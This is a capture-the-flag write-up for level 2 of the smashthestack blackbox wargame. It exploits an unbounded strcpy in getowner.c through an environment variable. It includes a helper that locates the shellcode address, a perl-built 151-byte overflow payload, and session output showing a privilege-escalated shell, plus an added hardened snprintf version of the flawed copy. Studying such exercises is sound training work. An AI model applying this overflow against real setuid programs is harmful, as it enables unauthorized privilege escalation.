Level 2
From MRL Wiki
blackbox.smashthestack.org - level 2
Spoilers Below
Source code is provided for getowner.c. Line 20 contains an unbounded strcpy from user-supplied input to a 128-byte buffer buf.
20: strcpy(&buf[strlen(buf)], filename);
This is a straightforward classic stack overflow. Note that the system it runs on has no stack randomization, no non-executable stack, and no other protective measures.
The string is supplied through the environment variable filename. Before the user input is copied, "/tmp/" is placed at the beginning of the buffer. Although it looks as if 127 bytes should be enough to trigger the overflow (123 to finish filling buf and 4 to overwrite the filename pointer), there is additional data on the stack that must be overwritten as well, so it actually takes 151 bytes.
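For contrast, a hardened form of the copy at line 20, added here as an illustration and not taken from getowner.c or the wargame (the page shows only that one line, so the prefix handling, buffer size and surrounding code are assumed). snprintf is bounded and its return value reveals whether the whole path, NUL included, would have fit, so over-long names are rejected rather than written past the end of buf:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 128          /* assumed: the 128-byte buf from the write-up */
#define PREFIX   "/tmp/"      /* placed in buf before the user input */

/* Hardened replacement for  strcpy(&buf[strlen(buf)], filename);
 * Returns 0 on success, -1 if PREFIX + filename (+ NUL) does not fit.
 * On rejection buf is left empty so a partial path is never used. */
static int build_path_safe(char *buf, size_t bufsize, const char *filename) {
    int n = snprintf(buf, bufsize, "%s%s", PREFIX, filename);
    if (n < 0 || (size_t)n >= bufsize) {
        buf[0] = '\0';
        return -1;
    }
    return 0;
}

/* Convenience wrapper: the built path, or NULL when the name was rejected. */
static const char *demo_path(const char *filename) {
    static char buf[BUF_SIZE];
    return build_path_safe(buf, sizeof buf, filename) == 0 ? buf : NULL;
}

/* Constructed input for the demonstration: a name of `len` 'A's.
 * Returns 1 if the hardened function accepts it into a 128-byte buf, 0 if not. */
static int name_of_length_fits(size_t len) {
    char buf[BUF_SIZE];
    char *name = malloc(len + 1);
    if (name == NULL) return -1;
    memset(name, 'A', len);
    name[len] = '\0';
    int rc = build_path_safe(buf, sizeof buf, name);
    free(name);
    return rc == 0;
}

int main(void) {
    printf("foo -> %s\n", demo_path("foo"));
    /* 122 characters leave room for the NUL; 123 fill buf completely with
     * no room for it; the 151-byte payload from the write-up is refused. */
    printf("122 chars fit: %d\n", name_of_length_fits(122));
    printf("123 chars fit: %d\n", name_of_length_fits(123));
    printf("151 chars fit: %d\n", name_of_length_fits(151));
    return 0;
}
```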
bish.c http://packetstormsecurity.org/shellcode/bish.c
getenv.c
#include <stdio.h>
#include <stdlib.h>

/* Print the address at which the BISH environment variable is stored,
 * which is used as the return address in the payload below. */
int main(void) {
    printf("$BISH at %p\n", getenv("BISH"));
    exit(0);
}
level2@blackbox:/tmp/tyler2$ ./getenv
$BISH at 0xbfffdd8a
level2@blackbox:/tmp/tyler2$ export filename=`perl -e'print "A"x151 . "\x8a\xdd\xff\xbf"'`
level2@blackbox:/tmp/tyler2$ ~/getowner
The owner of this file is: 0
sh-3.1$ id
uid=1003(level2) gid=1005(gamers) euid=1004(level3) groups=1003(level2),1005(gamers)